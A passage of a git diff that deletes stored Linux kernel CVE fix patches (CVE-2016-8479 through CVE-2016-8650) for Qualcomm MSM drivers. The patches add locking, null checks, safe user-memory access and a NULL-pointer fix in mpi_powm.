-@@ -2280,6 +2286,8 @@ static int __from_user_gamut_cfg_data_v17(
- pr_err("failed to copy the gamut payload from userspace\n");
- return -EFAULT;
- }
-+
-+ memset(&gamut_cfg_payload, 0, sizeof(gamut_cfg_payload));
- gamut_cfg_payload.mode = gamut_cfg_payload32.mode;
- for (i = 0; i < MDP_GAMUT_TABLE_NUM_V1_7; i++) {
- gamut_cfg_payload.tbl_size[i] =
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8479/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2016-8479/3.18/0001.patch
deleted file mode 100644
index 55e0cb67..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8479/3.18/0001.patch
+++ /dev/null
@@ -1,88 +0,0 @@ -From 1a9d60a353d6c8191cfec089f8cb502626bb0b0e Mon Sep 17 00:00:00 2001 -From: Jordan Crouse -Date: Tue, 31 May 2016 11:24:22 -0600 -Subject: msm: kgsl: Reserve a context ID slot but don't populate immediately - -When creating a context allocate an ID but don't populate the slot -with the context pointer until we are done setup up the rest of the -process. This avoids a race if somebody tries to free the same -identifier before the create operation is complete. - -Change-Id: Ic0dedbadca5b4cc4ce567afad48a33078b549439 -Signed-off-by: Jordan Crouse ---- - drivers/gpu/msm/kgsl.c | 21 +++++++++++++-------- - 1 file changed, 13 insertions(+), 8 deletions(-) - -diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c -index ccd8a1d..61be1f339 100644 ---- a/drivers/gpu/msm/kgsl.c -+++ b/drivers/gpu/msm/kgsl.c -@@ -525,21 +525,18 @@ void kgsl_context_dump(struct kgsl_context *context) - EXPORT_SYMBOL(kgsl_context_dump); - - /* Allocate a new context ID */ --static int _kgsl_get_context_id(struct kgsl_device *device, -- struct kgsl_context *context) -+static int _kgsl_get_context_id(struct kgsl_device *device) - { - int id; - - idr_preload(GFP_KERNEL); - write_lock(&device->context_lock); -- id = idr_alloc(&device->context_idr, context, 1, -+ /* Allocate the slot but don't put a pointer in it yet */ -+ id = idr_alloc(&device->context_idr, NULL, 1, - KGSL_MEMSTORE_MAX, GFP_NOWAIT); - write_unlock(&device->context_lock); - idr_preload_end(); - -- if (id > 0) -- context->id = id; -- - return id; - } - -@@ -563,7 +560,7 @@ int kgsl_context_init(struct kgsl_device_private *dev_priv, - char name[64]; - int ret = 0, id; - -- id = _kgsl_get_context_id(device, context); -+ id = _kgsl_get_context_id(device); - if (id == -ENOSPC) { - /* - * Before declaring that there are no contexts left try -@@ -572,7 +569,7 @@ int kgsl_context_init(struct kgsl_device_private *dev_priv, - */ - - flush_workqueue(device->events_wq); -- id = _kgsl_get_context_id(device, context); -+ 
id = _kgsl_get_context_id(device); - } - - if (id < 0) { -@@ -584,6 +581,8 @@ int kgsl_context_init(struct kgsl_device_private *dev_priv, - return id; - } - -+ context->id = id; -+ - kref_init(&context->refcount); - /* - * Get a refernce to the process private so its not destroyed, until -@@ -1713,6 +1712,12 @@ long kgsl_ioctl_drawctxt_create(struct kgsl_device_private *dev_priv, - goto done; - } - trace_kgsl_context_create(dev_priv->device, context, param->flags); -+ -+ /* Commit the pointer to the context in context_idr */ -+ write_lock(&device->context_lock); -+ idr_replace(&device->context_idr, context, context->id); -+ write_unlock(&device->context_lock); -+ - param->drawctxt_id = context->id; - done: - return result; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-8479/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2016-8479/4.4/0002.patch deleted file mode 100644 index 7cb6476a..00000000 --- a/Patches/Linux_CVEs/CVE-2016-8479/4.4/0002.patch +++ /dev/null 
@@ -1,89 +0,0 @@ -From eed663a48bec729bb66aaad18ab3fac3b7269581 Mon Sep 17 00:00:00 2001 -From: Jordan Crouse -Date: Tue, 31 May 2016 11:24:22 -0600 -Subject: msm: kgsl: Reserve a context ID slot but don't populate immediately - -When creating a context allocate an ID but don't populate the slot -with the context pointer until we are done setup up the rest of the -process. This avoids a race if somebody tries to free the same -identifier before the create operation is complete. - -Change-Id: Ic0dedbadca5b4cc4ce567afad48a33078b549439 -Signed-off-by: Jordan Crouse -Signed-off-by: Dumpeti Sathish Kumar ---- - drivers/gpu/msm/kgsl.c | 21 +++++++++++++-------- - 1 file changed, 13 insertions(+), 8 deletions(-) - -diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c -index 699d996..e204478 100644 ---- a/drivers/gpu/msm/kgsl.c -+++ b/drivers/gpu/msm/kgsl.c -@@ -491,21 +491,18 @@ void kgsl_context_dump(struct kgsl_context *context) - EXPORT_SYMBOL(kgsl_context_dump); - - /* Allocate a new context ID */ --static int _kgsl_get_context_id(struct kgsl_device *device, -- struct kgsl_context *context) -+static int _kgsl_get_context_id(struct kgsl_device *device) - { - int id; - - idr_preload(GFP_KERNEL); - write_lock(&device->context_lock); -- id = idr_alloc(&device->context_idr, context, 1, -+ /* Allocate the slot but don't put a pointer in it yet */ -+ id = idr_alloc(&device->context_idr, NULL, 1, - KGSL_MEMSTORE_MAX, GFP_NOWAIT); - write_unlock(&device->context_lock); - idr_preload_end(); - -- if (id > 0) -- context->id = id; -- - return id; - } - -@@ -529,7 +526,7 @@ int kgsl_context_init(struct kgsl_device_private *dev_priv, - char name[64]; - int ret = 0, id; - -- id = _kgsl_get_context_id(device, context); -+ id = _kgsl_get_context_id(device); - if (id == -ENOSPC) { - /* - * Before declaring that there are no contexts left try -@@ -538,7 +535,7 @@ int kgsl_context_init(struct kgsl_device_private *dev_priv, - */ - - flush_workqueue(device->events_wq); -- id = 
_kgsl_get_context_id(device, context); -+ id = _kgsl_get_context_id(device); - } - - if (id < 0) { -@@ -550,6 +547,8 @@ int kgsl_context_init(struct kgsl_device_private *dev_priv, - return id; - } - -+ context->id = id; -+ - kref_init(&context->refcount); - /* - * Get a refernce to the process private so its not destroyed, until -@@ -1733,6 +1732,12 @@ long kgsl_ioctl_drawctxt_create(struct kgsl_device_private *dev_priv, - goto done; - } - trace_kgsl_context_create(dev_priv->device, context, param->flags); -+ -+ /* Commit the pointer to the context in context_idr */ -+ write_lock(&device->context_lock); -+ idr_replace(&device->context_idr, context, context->id); -+ write_unlock(&device->context_lock); -+ - param->drawctxt_id = context->id; - done: - return result; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-8480/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-8480/3.10/0001.patch deleted file mode 100644 index aebaeb00..00000000 --- a/Patches/Linux_CVEs/CVE-2016-8480/3.10/0001.patch +++ /dev/null 
@@ -1,56 +0,0 @@ -From 0ed0f061bcd71940ed65de2ba46e37e709e31471 Mon Sep 17 00:00:00 2001 -From: Mallikarjuna Reddy Amireddy -Date: Tue, 22 Nov 2016 17:24:46 +0530 -Subject: qseecom: remove entry from qseecom_registered_app_list - -In an error handling case, the QSEECOM_IOCTL_LOAD_APP_REQ ioctl -freed the entry for new TA, but didn't removed it from -qseecom_registered_app_list. Make change to remove it. - -Change-Id: Id681fbf3c923027d3db875d506cbe3f971919a8d -Signed-off-by: Zhen Kong -Signed-off-by: Mallikarjuna Reddy Amireddy ---- - drivers/misc/qseecom.c | 11 ++++++++++- - 1 file changed, 10 insertions(+), 1 deletion(-) - -diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c -index b1c97ba..270fb95 100644 ---- a/drivers/misc/qseecom.c -+++ b/drivers/misc/qseecom.c -@@ -1349,6 +1349,7 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp) - struct qseecom_command_scm_resp resp; - struct qseecom_check_app_ireq req; - struct qseecom_load_app_ireq load_req; -+ bool first_time = false; - - /* Copy the relevant information needed for loading the image */ - if (copy_from_user(&load_img_req, -@@ -1395,6 +1396,7 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp) - &qseecom.registered_app_list_lock, flags); - ret = 0; - } else { -+ first_time = true; - pr_warn("App (%s) does'nt exist, loading apps for first time\n", - (char *)(load_img_req.img_name)); - /* Get the handle of the shared fd */ -@@ -1499,8 +1501,15 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp) - load_img_req.app_id = app_id; - if (copy_to_user(argp, &load_img_req, sizeof(load_img_req))) { - pr_err("copy_to_user failed\n"); -- kzfree(entry); - ret = -EFAULT; -+ if (first_time == true) { -+ spin_lock_irqsave( -+ &qseecom.registered_app_list_lock, flags); -+ list_del(&entry->list); -+ spin_unlock_irqrestore( -+ &qseecom.registered_app_list_lock, flags); -+ kzfree(entry); -+ } - } - - loadapp_err: --- -cgit 
v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-8480/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-8480/3.18/0002.patch deleted file mode 100644 index fcb29892..00000000 --- a/Patches/Linux_CVEs/CVE-2016-8480/3.18/0002.patch +++ /dev/null 
@@ -1,55 +0,0 @@ -From cd70f6025a7bbce89af7a7abf4c40a219fdea406 Mon Sep 17 00:00:00 2001 -From: Zhen Kong -Date: Fri, 4 Nov 2016 17:35:19 -0700 -Subject: qseecom: remove entry from qseecom_registered_app_list - -In an error handling case, the QSEECOM_IOCTL_LOAD_APP_REQ ioctl -freed the entry for new TA, but didn't removed it from -qseecom_registered_app_list. Make change to remove it. - -Change-Id: Id681fbf3c923027d3db875d506cbe3f971919a8d -Signed-off-by: Zhen Kong ---- - drivers/misc/qseecom.c | 11 ++++++++++- - 1 file changed, 10 insertions(+), 1 deletion(-) - -diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c -index db603f0..e9ebbee 100644 ---- a/drivers/misc/qseecom.c -+++ b/drivers/misc/qseecom.c -@@ -2183,6 +2183,7 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp) - struct qseecom_load_app_64bit_ireq load_req_64bit; - void *cmd_buf = NULL; - size_t cmd_len; -+ bool first_time = false; - - /* Copy the relevant information needed for loading the image */ - if (copy_from_user(&load_img_req, -@@ -2254,6 +2255,7 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp) - &qseecom.registered_app_list_lock, flags); - ret = 0; - } else { -+ first_time = true; - pr_warn("App (%s) does'nt exist, loading apps for first time\n", - (char *)(load_img_req.img_name)); - /* Get the handle of the shared fd */ -@@ -2385,8 +2387,15 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp) - load_img_req.app_id = app_id; - if (copy_to_user(argp, &load_img_req, sizeof(load_img_req))) { - pr_err("copy_to_user failed\n"); -- kzfree(entry); - ret = -EFAULT; -+ if (first_time == true) { -+ spin_lock_irqsave( -+ &qseecom.registered_app_list_lock, flags); -+ list_del(&entry->list); -+ spin_unlock_irqrestore( -+ &qseecom.registered_app_list_lock, flags); -+ kzfree(entry); -+ } - } - - loadapp_err: --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2016-8480/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2016-8480/4.4/0003.patch
deleted file mode 100644
index 8a85ad8e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8480/4.4/0003.patch
+++ /dev/null
@@ -1,55 +0,0 @@ -From 420d51e0733e72830fa591f1e67f5a40ce11dc51 Mon Sep 17 00:00:00 2001 -From: Zhen Kong -Date: Fri, 4 Nov 2016 17:35:19 -0700 -Subject: qseecom: remove entry from qseecom_registered_app_list - -In an error handling case, the QSEECOM_IOCTL_LOAD_APP_REQ ioctl -freed the entry for new TA, but didn't removed it from -qseecom_registered_app_list. Make change to remove it. - -Change-Id: Id681fbf3c923027d3db875d506cbe3f971919a8d -Signed-off-by: Zhen Kong ---- - drivers/misc/qseecom.c | 11 ++++++++++- - 1 file changed, 10 insertions(+), 1 deletion(-) - -diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c -index 3402a1b..249a76b 100644 ---- a/drivers/misc/qseecom.c -+++ b/drivers/misc/qseecom.c -@@ -2071,6 +2071,7 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp) - struct qseecom_load_app_64bit_ireq load_req_64bit; - void *cmd_buf = NULL; - size_t cmd_len; -+ bool first_time = false; - - /* Copy the relevant information needed for loading the image */ - if (copy_from_user(&load_img_req, -@@ -2142,6 +2143,7 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp) - &qseecom.registered_app_list_lock, flags); - ret = 0; - } else { -+ first_time = true; - pr_warn("App (%s) does'nt exist, loading apps for first time\n", - (char *)(load_img_req.img_name)); - /* Get the handle of the shared fd */ -@@ -2273,8 +2275,15 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp) - load_img_req.app_id = app_id; - if (copy_to_user(argp, &load_img_req, sizeof(load_img_req))) { - pr_err("copy_to_user failed\n"); -- kzfree(entry); - ret = -EFAULT; -+ if (first_time == true) { -+ spin_lock_irqsave( -+ &qseecom.registered_app_list_lock, flags); -+ list_del(&entry->list); -+ spin_unlock_irqrestore( -+ &qseecom.registered_app_list_lock, flags); -+ kzfree(entry); -+ } - } - - loadapp_err: --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2016-8481/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2016-8481/4.4/0002.patch
deleted file mode 100644
index 3be89d8f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8481/4.4/0002.patch
+++ /dev/null
@@ -1,185 +0,0 @@ -From c8c16b7406c68a5a9f35c5afbfcafd893e197425 Mon Sep 17 00:00:00 2001 -From: Sudheer Papothi -Date: Wed, 26 Oct 2016 01:07:04 +0530 -Subject: drivers: qcom: ultrasound: Lock async driver calls - -Adds lock to ioctl and other external calls to driver. -Adds missing null check in __usf_set_stream_param. - -Change-Id: I142f31c6bb46d6a394ad012077e1703875a120ad -Signed-off-by: Sudheer Papothi ---- - drivers/misc/qcom/qdsp6v2/ultrasound/usf.c | 66 ++++++++++++++++++++++++++---- - 1 file changed, 59 insertions(+), 7 deletions(-) - -diff --git a/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c b/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c -index 7572374..3bb95f5 100644 ---- a/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c -+++ b/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c -@@ -23,6 +23,7 @@ - #include - #include - #include -+#include - #include - #include - #include "q6usm.h" -@@ -135,6 +136,8 @@ struct usf_type { - uint16_t conflicting_event_filters; - /* The requested buttons bitmap */ - uint16_t req_buttons_bitmap; -+ /* Mutex for exclusive operations (all public APIs) */ -+ struct mutex mutex; - }; - - struct usf_input_dev_type { -@@ -1403,9 +1406,22 @@ static int __usf_set_stream_param(struct usf_xx_type *usf_xx, - int dir) - { - struct us_client *usc = usf_xx->usc; -- struct us_port_data *port = &usc->port[dir]; -+ struct us_port_data *port; - int rc = 0; - -+ if (usc == NULL) { -+ pr_err("%s: usc is null\n", -+ __func__); -+ return -EFAULT; -+ } -+ -+ port = &usc->port[dir]; -+ if (port == NULL) { -+ pr_err("%s: port is null\n", -+ __func__); -+ return -EFAULT; -+ } -+ - if (port->param_buf == NULL) { - pr_err("%s: parameter buffer is null\n", - __func__); -@@ -1538,10 +1554,12 @@ static int usf_get_stream_param(struct usf_xx_type *usf_xx, - return __usf_get_stream_param(usf_xx, &get_stream_param, dir); - } /* usf_get_stream_param */ - --static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg) -+static long __usf_ioctl(struct usf_type 
*usf, -+ unsigned int cmd, -+ unsigned long arg) - { -+ - int rc = 0; -- struct usf_type *usf = file->private_data; - struct usf_xx_type *usf_xx = NULL; - - switch (cmd) { -@@ -1704,6 +1722,18 @@ static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg) - release_xx(usf_xx); - - return rc; -+} /* __usf_ioctl */ -+ -+static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg) -+{ -+ struct usf_type *usf = file->private_data; -+ int rc = 0; -+ -+ mutex_lock(&usf->mutex); -+ rc = __usf_ioctl(usf, cmd, arg); -+ mutex_unlock(&usf->mutex); -+ -+ return rc; - } /* usf_ioctl */ - - #ifdef CONFIG_COMPAT -@@ -2147,12 +2177,11 @@ static int usf_get_stream_param32(struct usf_xx_type *usf_xx, - return __usf_get_stream_param(usf_xx, &get_stream_param, dir); - } /* usf_get_stream_param32 */ - --static long usf_compat_ioctl(struct file *file, -+static long __usf_compat_ioctl(struct usf_type *usf, - unsigned int cmd, - unsigned long arg) - { - int rc = 0; -- struct usf_type *usf = file->private_data; - struct usf_xx_type *usf_xx = NULL; - - switch (cmd) { -@@ -2160,7 +2189,7 @@ static long usf_compat_ioctl(struct file *file, - case US_START_RX: - case US_STOP_TX: - case US_STOP_RX: { -- return usf_ioctl(file, cmd, arg); -+ return __usf_ioctl(usf, cmd, arg); - } - - case US_SET_TX_INFO32: { -@@ -2269,6 +2298,20 @@ static long usf_compat_ioctl(struct file *file, - release_xx(usf_xx); - - return rc; -+} /* __usf_compat_ioctl */ -+ -+static long usf_compat_ioctl(struct file *file, -+ unsigned int cmd, -+ unsigned long arg) -+{ -+ struct usf_type *usf = file->private_data; -+ int rc = 0; -+ -+ mutex_lock(&usf->mutex); -+ rc = __usf_compat_ioctl(usf, cmd, arg); -+ mutex_unlock(&usf->mutex); -+ -+ return rc; - } /* usf_compat_ioctl */ - #endif /* CONFIG_COMPAT */ - -@@ -2277,13 +2320,17 @@ static int usf_mmap(struct file *file, struct vm_area_struct *vms) - struct usf_type *usf = file->private_data; - int dir = OUT; - struct usf_xx_type *usf_xx = 
&usf->usf_tx; -+ int rc = 0; - -+ mutex_lock(&usf->mutex); - if (vms->vm_flags & USF_VM_WRITE) { /* RX buf mapping */ - dir = IN; - usf_xx = &usf->usf_rx; - } -+ rc = q6usm_get_virtual_address(dir, usf_xx->usc, vms); -+ mutex_unlock(&usf->mutex); - -- return q6usm_get_virtual_address(dir, usf_xx->usc, vms); -+ return rc; - } - - static uint16_t add_opened_dev(int minor) -@@ -2336,6 +2383,8 @@ static int usf_open(struct inode *inode, struct file *file) - usf->usf_tx.us_detect_type = USF_US_DETECT_UNDEF; - usf->usf_rx.us_detect_type = USF_US_DETECT_UNDEF; - -+ mutex_init(&usf->mutex); -+ - pr_debug("%s:usf in open\n", __func__); - return 0; - } -@@ -2346,6 +2395,7 @@ static int usf_release(struct inode *inode, struct file *file) - - pr_debug("%s: release entry\n", __func__); - -+ mutex_lock(&usf->mutex); - usf_release_input(usf); - - usf_disable(&usf->usf_tx); -@@ -2354,6 +2404,8 @@ static int usf_release(struct inode *inode, struct file *file) - s_opened_devs[usf->dev_ind] = 0; - - wakeup_source_trash(&usf_wakeup_source); -+ mutex_unlock(&usf->mutex); -+ mutex_destroy(&usf->mutex); - kfree(usf); - pr_debug("%s: release exit\n", __func__); - return 0; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-8481/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8481/ANY/0001.patch deleted file mode 100644 index 5651b6b3..00000000 --- a/Patches/Linux_CVEs/CVE-2016-8481/ANY/0001.patch +++ /dev/null 
@@ -1,185 +0,0 @@ -From ce9db0874906f6aedd80bb28d457eadfe38bdd02 Mon Sep 17 00:00:00 2001 -From: Sudheer Papothi -Date: Wed, 26 Oct 2016 01:07:04 +0530 -Subject: drivers: qcom: ultrasound: Lock async driver calls - -Adds lock to ioctl and other external calls to driver. -Adds missing null check in __usf_set_stream_param. - -Change-Id: I142f31c6bb46d6a394ad012077e1703875a120ad -Signed-off-by: Sudheer Papothi ---- - drivers/misc/qcom/qdsp6v2/ultrasound/usf.c | 66 ++++++++++++++++++++++++++---- - 1 file changed, 59 insertions(+), 7 deletions(-) - -diff --git a/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c b/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c -index d535ccb..9270dbc 100644 ---- a/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c -+++ b/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c -@@ -22,6 +22,7 @@ - #include - #include - #include -+#include - #include - #include - #include "q6usm.h" -@@ -128,6 +129,8 @@ struct usf_type { - uint16_t conflicting_event_filters; - /* The requested buttons bitmap */ - uint16_t req_buttons_bitmap; -+ /* Mutex for exclusive operations (all public APIs) */ -+ struct mutex mutex; - }; - - struct usf_input_dev_type { -@@ -1376,9 +1379,22 @@ static int __usf_set_stream_param(struct usf_xx_type *usf_xx, - int dir) - { - struct us_client *usc = usf_xx->usc; -- struct us_port_data *port = &usc->port[dir]; -+ struct us_port_data *port; - int rc = 0; - -+ if (usc == NULL) { -+ pr_err("%s: usc is null\n", -+ __func__); -+ return -EFAULT; -+ } -+ -+ port = &usc->port[dir]; -+ if (port == NULL) { -+ pr_err("%s: port is null\n", -+ __func__); -+ return -EFAULT; -+ } -+ - if (port->param_buf == NULL) { - pr_err("%s: parameter buffer is null\n", - __func__); -@@ -1503,10 +1519,12 @@ static int usf_get_stream_param(struct usf_xx_type *usf_xx, - return __usf_get_stream_param(usf_xx, &get_stream_param, dir); - } /* usf_get_stream_param */ - --static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg) -+static long __usf_ioctl(struct usf_type 
*usf, -+ unsigned int cmd, -+ unsigned long arg) - { -+ - int rc = 0; -- struct usf_type *usf = file->private_data; - struct usf_xx_type *usf_xx = NULL; - - switch (cmd) { -@@ -1669,6 +1687,18 @@ static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg) - release_xx(usf_xx); - - return rc; -+} /* __usf_ioctl */ -+ -+static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg) -+{ -+ struct usf_type *usf = file->private_data; -+ int rc = 0; -+ -+ mutex_lock(&usf->mutex); -+ rc = __usf_ioctl(usf, cmd, arg); -+ mutex_unlock(&usf->mutex); -+ -+ return rc; - } /* usf_ioctl */ - - #ifdef CONFIG_COMPAT -@@ -2106,12 +2136,11 @@ static int usf_get_stream_param32(struct usf_xx_type *usf_xx, - return __usf_get_stream_param(usf_xx, &get_stream_param, dir); - } /* usf_get_stream_param32 */ - --static long usf_compat_ioctl(struct file *file, -+static long __usf_compat_ioctl(struct usf_type *usf, - unsigned int cmd, - unsigned long arg) - { - int rc = 0; -- struct usf_type *usf = file->private_data; - struct usf_xx_type *usf_xx = NULL; - - switch (cmd) { -@@ -2119,7 +2148,7 @@ static long usf_compat_ioctl(struct file *file, - case US_START_RX: - case US_STOP_TX: - case US_STOP_RX: { -- return usf_ioctl(file, cmd, arg); -+ return __usf_ioctl(usf, cmd, arg); - } - - case US_SET_TX_INFO32: { -@@ -2228,6 +2257,20 @@ static long usf_compat_ioctl(struct file *file, - release_xx(usf_xx); - - return rc; -+} /* __usf_compat_ioctl */ -+ -+static long usf_compat_ioctl(struct file *file, -+ unsigned int cmd, -+ unsigned long arg) -+{ -+ struct usf_type *usf = file->private_data; -+ int rc = 0; -+ -+ mutex_lock(&usf->mutex); -+ rc = __usf_compat_ioctl(usf, cmd, arg); -+ mutex_unlock(&usf->mutex); -+ -+ return rc; - } /* usf_compat_ioctl */ - #endif /* CONFIG_COMPAT */ - -@@ -2236,13 +2279,17 @@ static int usf_mmap(struct file *file, struct vm_area_struct *vms) - struct usf_type *usf = file->private_data; - int dir = OUT; - struct usf_xx_type *usf_xx = 
&usf->usf_tx; -+ int rc = 0; - -+ mutex_lock(&usf->mutex); - if (vms->vm_flags & USF_VM_WRITE) { /* RX buf mapping */ - dir = IN; - usf_xx = &usf->usf_rx; - } -+ rc = q6usm_get_virtual_address(dir, usf_xx->usc, vms); -+ mutex_unlock(&usf->mutex); - -- return q6usm_get_virtual_address(dir, usf_xx->usc, vms); -+ return rc; - } - - static uint16_t add_opened_dev(int minor) -@@ -2294,6 +2341,8 @@ static int usf_open(struct inode *inode, struct file *file) - usf->usf_tx.us_detect_type = USF_US_DETECT_UNDEF; - usf->usf_rx.us_detect_type = USF_US_DETECT_UNDEF; - -+ mutex_init(&usf->mutex); -+ - pr_debug("%s:usf in open\n", __func__); - return 0; - } -@@ -2304,6 +2353,7 @@ static int usf_release(struct inode *inode, struct file *file) - - pr_debug("%s: release entry\n", __func__); - -+ mutex_lock(&usf->mutex); - usf_release_input(usf); - - usf_disable(&usf->usf_tx); -@@ -2311,6 +2361,8 @@ static int usf_release(struct inode *inode, struct file *file) - - s_opened_devs[usf->dev_ind] = 0; - -+ mutex_unlock(&usf->mutex); -+ mutex_destroy(&usf->mutex); - kfree(usf); - pr_debug("%s: release exit\n", __func__); - return 0; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-8481/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-8481/ANY/0003.patch deleted file mode 100644 index ab99a331..00000000 --- a/Patches/Linux_CVEs/CVE-2016-8481/ANY/0003.patch +++ /dev/null 
@@ -1,26 +0,0 @@ -From 831da5d113d214db6894e9fd0ce98762ee8a544a Mon Sep 17 00:00:00 2001 -From: Nick Desaulniers -Date: Tue, 6 Dec 2016 09:57:57 -0800 -Subject: [PATCH] Kconfig: msm: disable ultrasound driver - -Bug: 31906415 -Bug: 31906657 -Bug: 32553868 -Change-Id: Iab736a5d5622098c89c76dbe6b0b395652bbae57 -Signed-off-by: Nick Desaulniers ---- - sound/soc/msm/Kconfig | 1 - - 1 file changed, 1 deletion(-) - -diff --git a/sound/soc/msm/Kconfig b/sound/soc/msm/Kconfig -index 6eb168e4d10d5..2e6f642241ef3 100644 ---- a/sound/soc/msm/Kconfig -+++ b/sound/soc/msm/Kconfig -@@ -267,7 +267,6 @@ config SND_SOC_MSM8994 - select SND_SOC_MSM_HDMI_CODEC_RX - select QTI_PP - select SND_SOC_CPE -- select MSM_ULTRASOUND - select SND_HWDEP - help - To add support for SoC audio on MSM8994. diff --git a/Patches/Linux_CVEs/CVE-2016-8483/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8483/ANY/0001.patch deleted file mode 100644 index 0b57e4dd..00000000 --- a/Patches/Linux_CVEs/CVE-2016-8483/ANY/0001.patch +++ /dev/null 
@@ -1,34 +0,0 @@ -From 6997dcb7ade1315474855821e64782205cb0b53a Mon Sep 17 00:00:00 2001 -From: Mohammed Khajapasha -Date: Tue, 28 Jun 2016 11:55:34 +0530 -Subject: msm-core: use get_user() API to read userspace data/settings - -Currently userspace data is getting accessed directly -and leading to crash, So use get_user() API to copy -userspace data/settings to kernel space. - -Change-Id: I3a75ec9503d8207829640bf88e1c3160bf72c9f0 -Signed-off-by: Mohammed Khajapasha ---- - drivers/power/qcom/msm-core.c | 4 ++-- - 1 file changed, 2 insertions(+), 2 deletions(-) - -diff --git a/drivers/power/qcom/msm-core.c b/drivers/power/qcom/msm-core.c -index 286c89f..8a55fd0 100644 ---- a/drivers/power/qcom/msm-core.c -+++ b/drivers/power/qcom/msm-core.c -@@ -486,9 +486,9 @@ static long msm_core_ioctl(struct file *file, unsigned int cmd, - return -EINVAL; - - get_user(cluster, &argp->cluster); -- mpidr = (argp->cluster << (MAX_CORES_PER_CLUSTER * -+ mpidr = (cluster << (MAX_CORES_PER_CLUSTER * - MAX_NUM_OF_CLUSTERS)); -- cpumask = argp->cpumask; -+ get_user(cpumask, &argp->cpumask); - - switch (cmd) { - case EA_LEAKAGE: --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-8650/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8650/ANY/0001.patch deleted file mode 100644 index e449ab06..00000000 --- a/Patches/Linux_CVEs/CVE-2016-8650/ANY/0001.patch +++ /dev/null 
@@ -1,100 +0,0 @@ -From f5527fffff3f002b0a6b376163613b82f69de073 Mon Sep 17 00:00:00 2001 -From: Andrey Ryabinin -Date: Thu, 24 Nov 2016 13:23:10 +0000 -Subject: mpi: Fix NULL ptr dereference in mpi_powm() [ver #3] - -This fixes CVE-2016-8650. - -If mpi_powm() is given a zero exponent, it wants to immediately return -either 1 or 0, depending on the modulus. However, if the result was -initalised with zero limb space, no limbs space is allocated and a -NULL-pointer exception ensues. - -Fix this by allocating a minimal amount of limb space for the result when -the 0-exponent case when the result is 1 and not touching the limb space -when the result is 0. - -This affects the use of RSA keys and X.509 certificates that carry them. - -BUG: unable to handle kernel NULL pointer dereference at (null) -IP: [] mpi_powm+0x32/0x7e6 -PGD 0 -Oops: 0002 [#1] SMP -Modules linked in: -CPU: 3 PID: 3014 Comm: keyctl Not tainted 4.9.0-rc6-fscache+ #278 -Hardware name: ASUS All Series/H97-PLUS, BIOS 2306 10/09/2014 -task: ffff8804011944c0 task.stack: ffff880401294000 -RIP: 0010:[] [] mpi_powm+0x32/0x7e6 -RSP: 0018:ffff880401297ad8 EFLAGS: 00010212 -RAX: 0000000000000000 RBX: ffff88040868bec0 RCX: ffff88040868bba0 -RDX: ffff88040868b260 RSI: ffff88040868bec0 RDI: ffff88040868bee0 -RBP: ffff880401297ba8 R08: 0000000000000000 R09: 0000000000000000 -R10: 0000000000000047 R11: ffffffff8183b210 R12: 0000000000000000 -R13: ffff8804087c7600 R14: 000000000000001f R15: ffff880401297c50 -FS: 00007f7a7918c700(0000) GS:ffff88041fb80000(0000) knlGS:0000000000000000 -CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 -CR2: 0000000000000000 CR3: 0000000401250000 CR4: 00000000001406e0 -Stack: - ffff88040868bec0 0000000000000020 ffff880401297b00 ffffffff81376cd4 - 0000000000000100 ffff880401297b10 ffffffff81376d12 ffff880401297b30 - ffffffff81376f37 0000000000000100 0000000000000000 ffff880401297ba8 -Call Trace: - [] ? __sg_page_iter_next+0x43/0x66 - [] ? sg_miter_get_next_page+0x1b/0x5d - [] ? 
